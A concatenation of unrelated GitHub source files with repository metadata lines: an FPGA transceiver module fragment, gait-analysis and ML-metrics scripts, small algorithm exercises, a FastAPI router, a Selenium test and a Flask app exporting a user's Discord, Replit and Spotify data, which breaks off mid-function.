self.tx_prbs_config.eq(self._tx_prbs_config.storage),
self.rx_prbs_config.eq(self._rx_prbs_config.storage),
self._rx_prbs_errors.status.eq(self.rx_prbs_errors)
]
def add_loopback_control(self):
self._loopback = CSRStorage(3)
self.comb += self.loopback.eq(self._loopback.storage)
def add_polarity_control(self):
self._tx_polarity = CSRStorage()
self._rx_polarity = CSRStorage()
self.gtx_params.update(
i_TXPOLARITY = self._tx_polarity.storage,
i_RXPOLARITY = self._rx_polarity.storage
)
def add_electrical_control(self):
self._tx_diffctrl = CSRStorage(4, reset=0b1111)
self._tx_postcursor = CSRStorage(5, reset=0b00000)
self._tx_postcursor_inv = CSRStorage(1, reset=0b0)
self._tx_precursor = CSRStorage(5, reset=0b00000)
self._tx_precursor_inv = CSRStorage(1, reset=0b0)
self.gtx_params.update(
i_TXDIFFCTRL = self._tx_diffctrl.storage,
i_TXPOSTCURSOR = self._tx_postcursor.storage,
i_TXPOSTCURSORINV = self._tx_postcursor_inv.storage,
i_TXPRECURSOR = self._tx_precursor.storage,
i_TXPRECURSORINV = self._tx_precursor_inv.storage,
)
def add_controls(self):
self.add_base_control()
self.add_prbs_control()
self.add_loopback_control()
self.add_polarity_control()
self.add_electrical_control()
def do_finalize(self):
self.specials += Instance("GTXE2_CHANNEL", **self.gtx_params)
| kamejoko80/linux-on-litex-vexriscv-legacy | liteiclink/liteiclink/transceiver/gtx_7series.py | gtx_7series.py | py | 47,116 | python | en | code | 0 | github-code | 36 |
37986696093 | """
This script is written to do analysis on GA study
"""
# import libraries
import re
import tsfresh
import numpy as np
import pandas as pd
from pandas import ExcelWriter
from sklearn.preprocessing import LabelBinarizer
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit, train_test_split
from ml_models.LinearRegression import LinearRegressionCalculator
from ml_models.DecisionTreeRegression import DecisionTreeRegressionCalculator
from ml_models.RandomForestRegression import RandomForestRegressionCalculator
# import methods from other scripts / packages
from storage.DataLoader import data_loader
from feature_extraction.FFT import fft_extractor
from feature_extraction.abs_energy import AbsoluteEnergyCalculator
# Constant declarations
col_names = ['Time_sec', 'Sens_L1', 'Sens_L2', 'Sens_L3', 'Sens_L4', 'Sens_L5', 'Sens_L6', 'Sens_L7', 'Sens_L8',
'Sens_R1', 'Sens_R2', 'Sens_R3', 'Sens_R4', 'Sens_R5', 'Sens_R6', 'Sens_R7', 'Sens_R8', 'TF_L', 'TF_R']
"""
Main Controller
"""
def study_ga_controller(demographics_data):
group_1_data, group_2_data = split_group_data(demographics_data)
group_1_analysis(group_1_data, group_2_data)
# group_2_analysis(group_2_data)
def split_group_data(demographics_data):
group_1_data = demographics_data[demographics_data['Group'] == 1]
group_2_data = demographics_data[demographics_data['Group'] == 2]
return group_1_data, group_2_data
def print_newline():
print("")
def print_seperator():
print("--------------------------")
# ----------------------------------------------------- GROUP 1 ------------------------------------------------------ #
def group_1_analysis(group_1_data, group_2_data):
print_newline()
print("#####################################")
print("Group 1 Analysis:")
print("#####################################")
# Create Empty Dataframe
all_patient_dataframe = pd.DataFrame(
columns=['ID', 'Patient_Number', 'Study', 'Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4'])
df1 = pd.DataFrame([[np.nan] * len(all_patient_dataframe.columns)], columns=all_patient_dataframe.columns)
patient_data_loader = data_loader()
patient_data_file_paths = patient_data_loader.get_patient_file_paths()
group_1_2_data = group_1_data[['ID', 'Gender', 'HoehnYahr']].append(group_2_data[['ID', 'Gender', 'HoehnYahr']])
# all_patient_dataframe = GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1)
# all_patient_dataframe = pd.merge(all_patient_dataframe, group_1_2_data, how='left', on=['ID'])
# writer = ExcelWriter('Study_Ga_df.xlsx')
# all_patient_dataframe.to_excel(writer, 'Sheet1')
# writer.save()
all_patient_dataframe = pd.read_excel('Study_Ga_df.xlsx', sheet_name="Sheet1")
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(all_patient_dataframe, all_patient_dataframe["HoehnYahr"]):
strat_train_set = all_patient_dataframe.loc[train_index]
strat_test_set = all_patient_dataframe.loc[test_index]
'''
print("Train Set:")
print_newline()
print(strat_train_set)
print_newline()
print("Test Set:")
print_newline()
print(strat_test_set)
'''
train_models(strat_train_set, strat_test_set)
def GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1):
for patient_file_path in patient_data_file_paths:
# Read patient data
patient_data = patient_data_loader.read_patient_data(patient_file_path)
filename_fields = extract_fields_from_filename(patient_data_loader, patient_file_path)
study_name = filename_fields.group(1)
patient_type = filename_fields.group(2)
patient_number = filename_fields.group(3)
data_file_number = filename_fields.group(4)
# plot_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# plot_zoomed_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# add empty row entry
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'left', data_file_number)
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'right', data_file_number)
return all_patient_dataframe
def extract_fields_from_filename(patient_data_loader, patient_file_path):
patient_filename = patient_data_loader.extract_file_name(patient_file_path)
pattern = "([A-Z][a-z])([A-Z][a-z])([\d]+)_([\d]+)"
fields_from_filename = re.match(pattern, patient_filename)
return fields_from_filename
def add_patient_data(all_patient_dataframe, patient_data, patient_number, patient_study, patient_type, foot, data_file_number):
all_patient_dataframe.loc[0, 'ID'] = patient_study + patient_type + patient_number
all_patient_dataframe.loc[0, 'Patient_Number'] = patient_number
all_patient_dataframe.loc[0, 'Study'] = patient_study
all_patient_dataframe.loc[0, 'Patient_Type'] = patient_type
all_patient_dataframe.loc[0, 'Foot'] = foot
all_patient_dataframe.loc[0, 'file_number'] = data_file_number
fft = fft_extractor()
abs_en = AbsoluteEnergyCalculator()
all_patient_dataframe = extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en)
return all_patient_dataframe
def train_models(strat_train_set, strat_test_set):
strat_train_set, strat_train_labels, strat_test_set, strat_test_labels = clean_sets(strat_train_set, strat_test_set)
print(strat_test_labels.describe())
print_seperator()
print("Linear Regression:")
lr_calculator = LinearRegressionCalculator()
lr_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Decision Tree Regression:")
tree_calculator = DecisionTreeRegressionCalculator()
tree_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Random Forest Regression:")
rf_calculator = RandomForestRegressionCalculator()
rf_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
def clean_sets(strat_train_set, strat_test_set):
data_col = ['Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4', 'Gender']
strat_train_set['Foot'] = strat_train_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_train_set['Foot'] = strat_train_set['Foot'].astype(int)
strat_test_set['Foot'] = strat_test_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_test_set['Foot'] = strat_test_set['Foot'].astype(int)
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].astype(int)
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].astype(int)
strat_train_labels = strat_train_set.loc[:, 'HoehnYahr']
strat_train_set = strat_train_set[data_col]
strat_test_labels = strat_test_set.loc[:, 'HoehnYahr']
strat_test_set = strat_test_set[data_col]
return strat_train_set, strat_train_labels, strat_test_set, strat_test_labels
# ----------------------------------------------------- GROUP 2 ------------------------------------------------------ #
def group_2_analysis(group_2_data):
print_newline()
print("#####################################")
print("Group 2 Analysis:")
print("#####################################")
# group_2_study_ga()
# group_2_study_ju()
# group_2_study_si()
# ------------------------------------------ FEATURE EXTREACTION METHODS --------------------------------------------- #
def find_gait_cycle(patient_data):
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['Sens_L1'] == 0) & (patient_data['Sens_L2'] == 0) &
(patient_data['Sens_L3'] == 0) & (patient_data['Sens_L4'] == 0) &
(patient_data['Sens_L5'] == 0) & (patient_data['Sens_L6'] == 0) &
(patient_data['Sens_L7'] == 0) & (patient_data['Sens_L8'] == 0)]['Time_sec'])
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['TF_L'] == 0)]['Time_sec'])
gait_cycle['Time_sec'] = gait_cycle['Time_sec'].astype(int)
gait_cycle = gait_cycle['Time_sec'].unique()
print_newline()
print_seperator()
print("Values with zero VGRF:\n")
print(gait_cycle)
print_seperator()
def extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en):
if foot == "left":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'left')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_L']], 'TF_L')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_L']], 'TF_L', all_patient_dataframe)
elif foot == "right":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'right')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_R']], 'TF_R')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_R']], 'TF_R', all_patient_dataframe)
return all_patient_dataframe
def add_foot_coeffs(all_patient_dataframe, fft, patient_data, feet_type):
if feet_type == 'left':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_L']], 'TF_L')
elif feet_type == 'right':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_R']], 'TF_R')
else:
raise ValueError("add_foot_coeffs() : Wrong value supplied")
all_patient_dataframe.loc[0, 'coeff_1'] = foot_coeff['coeff_1__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_2'] = foot_coeff['coeff_2__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_3'] = foot_coeff['coeff_3__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_4'] = foot_coeff['coeff_4__attr_"real"']
return all_patient_dataframe
def extract_eda_features(patient_data, col_name, all_patient_dataframe):
all_patient_dataframe.loc[0, 'Median'] = tsfresh.feature_extraction.feature_calculators.median(patient_data[col_name])
all_patient_dataframe.loc[0, 'Max'] = tsfresh.feature_extraction.feature_calculators.maximum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Min'] = tsfresh.feature_extraction.feature_calculators.minimum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Skewness'] = tsfresh.feature_extraction.feature_calculators.skewness(patient_data[col_name])
all_patient_dataframe.loc[0, 'Std'] = tsfresh.feature_extraction.feature_calculators.standard_deviation(patient_data[col_name])
all_patient_dataframe.loc[0, 'Variance'] = tsfresh.feature_extraction.feature_calculators.variance(patient_data[col_name])
return all_patient_dataframe
# -------------------------------------------------- PLOTTING METHODS ------------------------------------------------ #
def plot_patient_data(patient_df, x_col_name, y_col_name, plot_title):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(plot_title)
plt.show()
def plot_zoomed_patient_data(patient_df, x_col_name, y_col_name, plot_title):
zoomed_time_data = patient_df[patient_df[x_col_name] < 20]
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=zoomed_time_data)
ax.set_title(plot_title)
plt.show()
def plot_sensor_data(patient_df, x_col_name, y_col_name, sensor_name):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(sensor_name + "reading over time")
plt.show()
| emilymacq/Project-Clear-Lungs | Parkinsons_ML/main/Study_Ga.py | Study_Ga.py | py | 12,820 | python | en | code | 2 | github-code | 36 |
27770003302 | import numpy as np
import pandas as pd
import matplotlib
import metrics
import sklearn
import xgboost
from sklearn import metrics
from decimal import *
import graphviz
'''
新細明體:PMingLiU
細明體:MingLiU
標楷體:DFKai-SB
黑体:SimHei
宋体:SimSun
新宋体:NSimSun
仿宋:FangSong
楷体:KaiTi
仿宋_GB2312:FangSong_GB2312
楷体_GB2312:KaiTi_GB2312
微軟正黑體:Microsoft JhengHei
微软雅黑体:Microsoft YaHei
————————————————
metrics.confusion_matrix(y_true, y_pred, labels=None, sample_weight=None)
metrics.accuracy_score(y_true,y_pred)
metrics.average_precision_score(y_true, y_score, average='macro', sample_weight=None)
metrics.precision_score(y_true, y_pred, labels=None, pos_label=1, average='binary',)
metrics.recall_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
metrics.f1_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
precision,recall,thresholds=metrics.precision_recall_curve(y_true,y_pred)
>>> plt.plot(recall, precision)
fpr,tpr,thresholds = metrics.roc_curve(y_true, y_ pred, pos_label=None, sample_weight=None, drop_intermediate=True)
>>> plt.plot(fpr,tpr)
metrics.roc_auc_score(y_true, y_pred, average='macro', sample_weight=None)
metrics.auc(fpr, tpr)
metrics.mean_absolute_error(y_true, y_pred, sample_weight=none, multioutput='uniform_average')
metrics.mean_squared_error(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
metrics.r2_score(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
用于多分类,只有两个属性可以选择 ‘macro’ 和 ‘weighted’
' macro ':计算每个标签的指标,并计算它们的未加权平均值。不考虑样本类别是否平衡。
' weighted ':计算每个标签的指标,并找到它们的平均值,对(每个标签的真实实例的数量)进行加权。
'micro':整体计算TP、FN、FP,然后根据公式计算得分。
'''
def classificationModel(y_true,y_pred):
nameValueDict={}
#混淆矩阵
confusionMatrix = metrics.confusion_matrix(y_true, y_pred)
#准确率
accuracyScore = metrics.accuracy_score(y_true, y_pred)
#精确率
precisionScore = metrics.precision_score(y_true, y_pred,average=None)
#召回率
recallScore = metrics.recall_score(y_true, y_pred,average=None)
#f1 只对2分类问题有效
# None, 'micro', 'macro', 'weighted'
f1Score = metrics.f1_score(y_true, y_pred,average=None)
nameValueDict.update({})
#pr曲线
precision,recall,thresholds = metrics.precision_recall_curve(y_true,y_pred)
matplotlib.plt.plot(recall, precision)
fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred,drop_intermediate = True)
# >> > plt.plot(fpr, tpr)
rocAucScore = metrics.roc_auc_score(y_true, y_pred)
aucArea = metrics.auc(fpr, tpr)
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'precisionScore':precisionScore})
nameValueDict.update({'recallScore':recallScore})
# nameValueDict.update({'f1Score':f1Score})
nameValueDict.update({'auc':metrics.auc(fpr, tpr)})
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'aucArea':aucArea})
return nameValueDict
def regressionModel(y_true,y_pred):
nameValueDict = {}
MAE = metrics.mean_absolute_error(y_true, y_pred)
MSE = metrics.mean_squared_error(y_true, y_pred)
r2 = metrics.r2_score(y_true, y_pred)
nameValueDict.update({'MAE':MAE})
nameValueDict.update({'MSE':MSE})
nameValueDict.update({'r2':r2})
return nameValueDict
def entU(u):
return [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
#条件熵
def uConditionV(u,v):
entu = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
entv = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(v, return_counts=True)[1]]][0]
# v 解释变量
vid, vct = np.unique(v, return_counts=True)
# 条件信息
vidEntropy = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u[v == i], return_counts=True)[1] for i in vid]]
#条件熵
entUconditonV= np.sum(np.array(vidEntropy) * (vct / np.sum(vct)))
return entUconditonV
#信息增益
def gainuv(u,v):
return entU(u) - uConditionV(u,v)
def gainRatio(u, v):
return gainuv(u,v) / entU((v))
def display_version():
print('np.version : ',np.__version__)
print('pd.version : ',pd.__version__)
print('matplotlib.version : ',matplotlib.__version__)
print('sklearn.version : ',sklearn.__version__)
print('xgboost.version : ',xgboost.__version__)
print('graphviz.version',graphviz.__version__)
display_version()
#数据查看tool
def overview(data):
print('\n======================= data overview =======================\n')
print('\n重复行数 : ',data.duplicated().sum(axis=0))
print('重复记录为:')
print(data[data.duplicated()])
print('\n数据总体缺失情况 : ')
print('总记录数 : ',data.shape[0])
print('\n各列没有缺失的样本数量:')
print(data.notnull().sum())
print('\n各列缺失的样本数量:')
print(data.isnull().sum())
print('\n各列缺失比例')
print(data.isnull().mean())
print('\n缺失行\n')
print(data.loc[data.isnull().sum(axis=1)>0,:])
print('\n缺失列\n')
print(data.loc[:,data.isnull().sum(axis=0)>0])
print('\n缺失区域【缺失行+缺失列】\n')
print(data.loc[data.isnull().sum(axis=1) > 0, data.isnull().sum(axis=0) > 0])
print('\n\n')
print('\n所在列及缺失的行索引号\n')
for i in data.columns:
print(i,' : ',list(np.where(pd.isna(data[i]))[0]))
print('\n\n')
def basicOperate(data):
print('\n\n')
print('\n删除重复行\n')
data.drop_duplicates(inplace=True)
print('\n\n')
print('\n\n')
print('\n\n')
def dropRank(data,thresh):
threshold = thresh
print('显示空值个数大于 {} 的行,这些行,予以删除'.format(data.shape[1] - threshold))
print(data.loc[data.isnull().sum(axis=1) > data.shape[1] - threshold])
print('=======================================')
print(data.loc[data.isnull().sum(axis=1) == data.shape[1] - threshold])
print('=======================================')
print('显示非空个数大于等于 {} 的行,这些行,予以保留'.format(threshold))
print(data.dropna(thresh=threshold))
data.dropna(thresh=threshold,inplace=True)
# 离散型 gini系数 x是自变量,y是flag
def giniC(x, y):
x_id, x_ct = np.unique(x, return_counts=True)
p_x = [ct / sum(ct) for ct in [np.unique(x, return_counts=True)[1]]]
gini = [1 - np.sum(p ** 2) for p in
[ct / sum(ct) for ct in [np.unique(y[x == i], return_counts=True)[1] for i in x_id]]]
return np.sum(np.array(p_x) * np.array(gini))
# 连续型 gini系数 x是自变量,y是flag
def giniS(y, x):
# 将离散数据转成float
x.astype(float)
# 对离散数据排序
sorted_x = np.sort(x)
split_point_list = []
split_point_gini = []
# 求分界点
for i in range(0, len(sorted_x) - 1, 1):
split_point_list.append(np.mean([sorted_x[i], sorted_x[i + 1]]))
# 依次计算每个分界点分割后的gini系数
for i in split_point_list:
# 分界后,就是二分类了
xi = pd.Series.copy(x)
xi[xi <= i] = 0
xi[xi > i] = 1
# 根据新分界点,计算权重(频数、概率)
w_i = [[p for p in ct / np.sum(ct)] for ct in [np.unique(xi, return_counts=True)[1]]]
# 分类
x_id, x_ct = np.unique(xi, return_counts=True)
# 每个分界点分类的gini
gini_x_id = [np.sum([(p - p ** 2) for p in ct / np.sum(ct)]) for ct in
[np.unique(y[xi == i], return_counts=True)[1] for i in x_id]]
# 计算每个分界点的gini
gini = Decimal(str(np.sum(w_i * np.array(gini_x_id)))).quantize(Decimal('0.0000'),ROUND_HALF_UP)
split_point_gini.append(gini)
# 封装成字典
split_point_gini_dict = dict(zip(split_point_list, split_point_gini))
return split_point_gini_dict
| kshsky/PycharmProjects | machinelearning/tools/mlTools.py | mlTools.py | py | 8,384 | python | en | code | 0 | github-code | 36 |
3458272947 | # -*- coding: utf-8 -*-
# @Time : 2020/6/1 16:16
# @Author : piguanghua
# @FileName: binary_search.py
# @Software: PyCharm
#titile:binary-search
#Number:704
class Solution:
#def search(self, nums: List[int], target: int) -> int:
def search(self, nums, target):
start = 0
end = len(nums) - 1
while start + 1 < end: # 邻近or相等跳出循环
#mid = int( ( start + end) / 2 )
mid = start + (end - start) // 2
if nums[mid] == target:
start = mid
elif nums[mid] > target:
end = mid
else:
start = mid
if nums[start] == target:
return start
elif nums[end] == target:
return end
else:
return -1
if __name__ == '__main__':
nums, target = [1, 3, 5, 6], 7
print(Solution().search(nums, target)) | pi408637535/Algorithm | com/study/algorithm/binary_search/binary_search.py | binary_search.py | py | 905 | python | en | code | 1 | github-code | 36 |
71002375784 | """
46. Faça um programa que leia um número inteiro positivo de três digitos (de 100 a 999),
Gere outro número formado pelos dígitos invertidos do número lido
"""
try:
valor = int(input('Insira um três digitos inteiros (de 100 a 999): '))
if (valor >= 100) and (valor <= 999):
x = str(valor)
print(x[::-1])
else:
print('ERRO!!! Você não digitou os digitos inteiros (de 100 a 999)')
except ValueError:
print('ERRO!!! o valor digitado tem que ser inteiro') | Kaiquenakao/Python | Variáveis e Tipos de Dados em Python/Exercicio46.py | Exercicio46.py | py | 516 | python | pt | code | 5 | github-code | 36 |
40586478771 | from fastapi import APIRouter, Depends, status
from sqlalchemy.ext.asyncio import AsyncSession
from src.authentication import AuthModel, get_token_user
from src.core.exceptions import UnprocessableEntityException
from src.db.postgres import get_db
from .dependencies import get_token_parent
from .parents.crud import parent_crud
from .parents.models import ParentModel
from .parents.schemes import ResponseParentScheme, UpdateParentScheme
router = APIRouter()
@router.get(
path="/me",
summary="View a personal profile",
response_model=ResponseParentScheme,
)
async def watch_me(
parent: ParentModel = Depends(get_token_parent),
):
return parent
@router.patch(
path="/me",
summary="Update a personal profile",
response_description="Successful Response returns only status code 200",
)
async def update_me(
*,
db: AsyncSession = Depends(get_db),
parent: ParentModel = Depends(get_token_parent),
update_data: UpdateParentScheme,
):
update_data = update_data.dict(exclude_none=True)
if not update_data:
return None
_, err = await parent_crud.update(db, parent, update_data)
if err is not None:
raise UnprocessableEntityException(detail=err)
return None
@router.delete(
path="/me",
summary="Delete a personal profile",
status_code=status.HTTP_204_NO_CONTENT,
response_description="Successful Response returns only status code 204",
)
async def delete_me(
db: AsyncSession = Depends(get_db),
auth_user: AuthModel = Depends(get_token_user),
):
await parent_crud.delete_auth(db, auth_user.email)
return None
| Xewus/KidEdVisor | backend/src/parents/router.py | router.py | py | 1,626 | python | en | code | 0 | github-code | 36 |
74649269864 | # -*- coding: utf-8 -*-
# @Project : selenium_event
# @File : test_alert.py
# @Software: PyCharm
# @Author : Lizhipeng
# @Email : 1907878011@qq.com
# @Time : 2021/9/26 17:16
from selenium.webdriver import ActionChains
from seleium_study.selenium_js.base import Base
class TestAlert(Base):
def test_alert(self):
self.driver.get('https://www.runoob.com/try/try.php?filename=jqueryui-api-droppable')
# 切换frame
self.driver.switch_to.frame('iframeResult')
top = self.driver.find_element_by_xpath('//*[@id="draggable"]')
end = self.driver.find_element_by_xpath('//*[@id="droppable"]')
# 拖拽元素top到元素end
action = ActionChains(self.driver)
action.drag_and_drop(top, end).perform()
# 焦点切换到弹出框上,点击弹出框上的确定
self.driver.switch_to.alert.accept()
# 切换回默认的frame
self.driver.switch_to.default_content()
self.driver.find_element_by_xpath('//*[@id="submitBTN"]').click()
| iospeng/python | pycharm_demo/selenium_event/seleium_study/selenium_file_alert/test_alert.py | test_alert.py | py | 1,036 | python | en | code | 0 | github-code | 36 |
2391690633 | from threading import Thread
from flask import Flask, request, redirect, session, render_template, send_file, Response, flash
from flask_session import Session
import os, json
from bs4 import BeautifulSoup, SoupStrainer
import requests, lxml, cchardet
app = Flask('')
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
from requests_oauthlib import OAuth2Session
import getpass
import random, string, asyncio
import os
import shutil
app.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
app.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
# Disable SSL requirement
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
# Settings for your app
base_discord_api_url = 'https://discordapp.com/api'
client_id = os.environ['DISCORD_CLIENT_ID'] # Get from https://discordapp.com/developers/applications
client_id.encode('unicode_escape')
client_secret = os.environ['DISCORD_CLIENT_SECRET']
redirect_uri='https://DataPak.coolcodersj.repl.co/oauth_callback'
scope = ['identify', 'email', 'connections', 'guilds', 'applications.builds.read']
token_url = 'https://discord.com/api/oauth2/token'
authorize_url = 'https://discord.com/api/oauth2/authorize'
app = Flask(__name__)
app.secret_key = os.environ['APP_SECRET_KEY'].encode('utf-8')
@app.route("/")
def home():
if 'discord_token' not in session.keys():
disc = ""
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response = discord.get(base_discord_api_url + '/users/@me')
disc = response.json()['username'] + "#" + response.json()['discriminator']
if not "gh_token" in session.keys():
gh = ""
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
gh = r.json()['login']
if not "spotify_token" in session.keys():
spotify = ""
else:
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if "error" in r.json() and r.json()['error']['message'] == "The access token expired":
spotify_client_id, spotify_client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': spotify_client_id,
"client_secret": spotify_client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
spotify = r.json()['display_name']
return render_template("index.html", replitusername=request.headers['X-Replit-User-Name'], discordusername=disc, gh=gh, spotify=spotify)
@app.route('/discord')
def discord():
oauth = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=scope)
login_url, state = oauth.authorization_url(authorize_url)
session['state'] = state
return redirect(login_url)
@app.route("/oauth_callback")
def oauth_callback():
print(type(client_id))
discord = OAuth2Session(client_id, redirect_uri=redirect_uri, state=session['state'], scope=scope)
token = discord.fetch_token(
token_url,
client_secret=client_secret,
authorization_response=request.url,
)
session['discord_token'] = token
return redirect("/")
@app.route("/discord/generate")
def gendisc():
if not 'discord_token' in session:
disc = ""
return redirect("/")
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response1 = discord.get(base_discord_api_url + '/users/@me')
response2 = discord.get(base_discord_api_url + '/users/@me/connections')
response3 = discord.get(base_discord_api_url + '/users/@me/guilds')
disc = {"account": response1.json(), "connections": response2.json(), "guilds": response3.json()}
resp = Response(json.dumps(disc))
resp.headers['Content-Type'] = 'application/json'
return resp
@app.route('/discord/info')
def discordinfo():
return render_template("discordinfo.html")
@app.route('/replit/info')
def replitinfo():
return render_template("replitinfo.html")
@app.route("/replit/generate")
def replit():
try:
username = request.headers['X-Replit-User-Name']
os.remove(f'DataPak{username}.zip')
except:
pass
globals()['replurls'] = []
def findrepls(r):
global replurls
if r.status_code == 200:
soup = BeautifulSoup(r.content, "lxml")
btn = soup.find_all('a', class_='jsx-688104393')
repls = soup.find_all("a", class_='repl-item-wrapper')
for g in repls:
globals()['replurls'].append(str(g['href']))
if btn != []:
r = requests.get(f"https://replit.com{btn[0]['href']}")
findrepls(r)
else:
return
r = requests.get(f"https://replit.com/@{request.headers['X-Replit-User-Name']}")
findrepls(r)
username = request.headers['X-Replit-User-Name']
os.mkdir(f"DataPak{username}")
for repl in replurls:
r = requests.get(f'https://replit.com{repl}.zip')
f = open(f'DataPak{username}/{repl.split("/")[-1]}.zip', "w+")
print(r.content, file=f)
f.close()
r = requests.get(f"https://replit.com/data/profiles/{request.headers['X-Replit-User-Name']}").json()
f = open(f'DataPak{username}/account.json', "a")
del r['repls']
print(r, file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/info')
def spotinfo():
return render_template('spotifyinfo.html')
@app.route('/spotify')
def spot():
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
scopes = [
'user-read-recently-played',
'user-top-read',
'user-read-playback-position',
'user-read-playback-state',
'user-read-currently-playing',
'playlist-read-private',
'playlist-read-collaborative',
'user-follow-read',
'user-follow-modify',
'user-library-read',
'user-read-email',
'user-read-private',
]
scopes = " ".join(scopes)
if not "spotify_token" in session.keys():
return redirect(f"https://accounts.spotify.com/authorize?response_type=code&client_id={client_id}&scope={scopes}&redirect_uri=https://datapak.coolcodersj.repl.co/spotify/callback")
else:
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if artists.text == "":
artists = {"None": "None"}
else:
if "message" in artists.json() and artists.json()['message'] == "The access token expired":
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
